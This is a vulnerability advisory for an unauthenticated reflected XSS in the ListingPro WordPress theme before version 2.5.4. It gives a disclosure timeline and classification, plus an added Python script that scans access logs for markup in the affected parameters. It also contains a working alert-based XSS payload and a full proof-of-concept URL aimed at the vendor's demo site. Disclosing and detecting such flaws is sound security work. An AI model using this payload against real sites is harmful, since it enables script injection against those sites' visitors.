ListingPro < 2.5.4 - Unauthenticated Reflected XSS



Description
A reflected XSS vulnerability was discovered in the «ListingPro - WordPress Directory Theme». Tested version: v2.5.3.


Edit - WPScanTeam:
January 13th, 2020 - Report Received & Envato Contacted
January 13th, 2020 - Envato Investigating
January 15th, 2020 - Theme updated, v2.5.4, fixing the issue

Proof of Concept
----[]- Info: -[]----
Demo website: https://classic.listingprowp.com/


----[]- Reflected XSS: -[]----
Payload Sample: "><img src=x onerror=(alert)(`m0ze`);//">

PoC: https://classic.listingprowp.com/?select=&lp_s_loc="><img src=x onerror=(alert)(`m0ze`);//">&lp_s_tag="><img src=x onerror=(alert)(`m0ze`);//">&lp_s_cat=&s=home&post_type=listing
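
For sites that ran a version below 2.5.4, the following added example (not part of the original advisory or the theme's code) scans web access logs for requests whose lp_s_loc or lp_s_tag values decode to HTML markup characters, the two parameters the PoC URL above uses. The log lines, the combined log format and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Query parameters the advisory's PoC URL shows carrying the payload.
WATCHED_PARAMS = ("lp_s_loc", "lp_s_tag")
# Characters that close an HTML attribute value or open a new tag.
MARKUP = re.compile(r'[<>"]')
# Request field of a combined-format access log line (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, rounds=2):
    """Undo extra layers of percent-encoding left after parse_qs."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(log_line):
    """Return {param: decoded value} for watched params containing markup."""
    match = REQUEST.search(log_line)
    if not match:
        return {}
    query = urlsplit(match.group(1)).query
    hits = {}
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name not in WATCHED_PARAMS:
            continue
        for value in values:
            value = decode_fully(value)
            if MARKUP.search(value):
                hits[name] = value
    return hits

def scan(lines):
    """Return (line_number, hits) for every log line worth reviewing."""
    flagged = [(n, suspicious_params(l)) for n, l in enumerate(lines, 1)]
    return [(n, h) for n, h in flagged if h]

# Constructed sample log lines (documentation IP addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Jan/2020:10:00:00 +0000] "GET /?select=&lp_s_loc=New+York&lp_s_tag=pizza&lp_s_cat=&s=home&post_type=listing HTTP/1.1" 200 5120',
    '198.51.100.7 - - [15/Jan/2020:10:01:00 +0000] "GET /?select=&lp_s_loc=%22%3E%3Cimg%20src%3Dx%3E&lp_s_cat=&s=home&post_type=listing HTTP/1.1" 200 5300',
    '198.51.100.7 - - [15/Jan/2020:10:02:00 +0000] "GET /?lp_s_tag=%2522%253E&s=home&post_type=listing HTTP/1.1" 200 5290',
]

if __name__ == "__main__":
    for line_no, hits in scan(SAMPLE_LOG):
        print(line_no, hits)
```

A hit only shows that markup was sent in one of these parameters; whether it was reflected unescaped depends on the theme version serving the request.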

Affects Theme

fixed in version 2.5.4

References

URL https://themeforest.net/item/listingpro-multipurpose-directory-theme/19386460

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher m0ze
Submitter m0ze
Submitter Twitter m0ze_ru
Views 6915
Verified No
WPVDB ID 10025

Timeline

Publicly Published 2020-01-15 (3 months ago)
Added 2020-01-15 (3 months ago)
Last Updated 2020-01-20 (3 months ago)
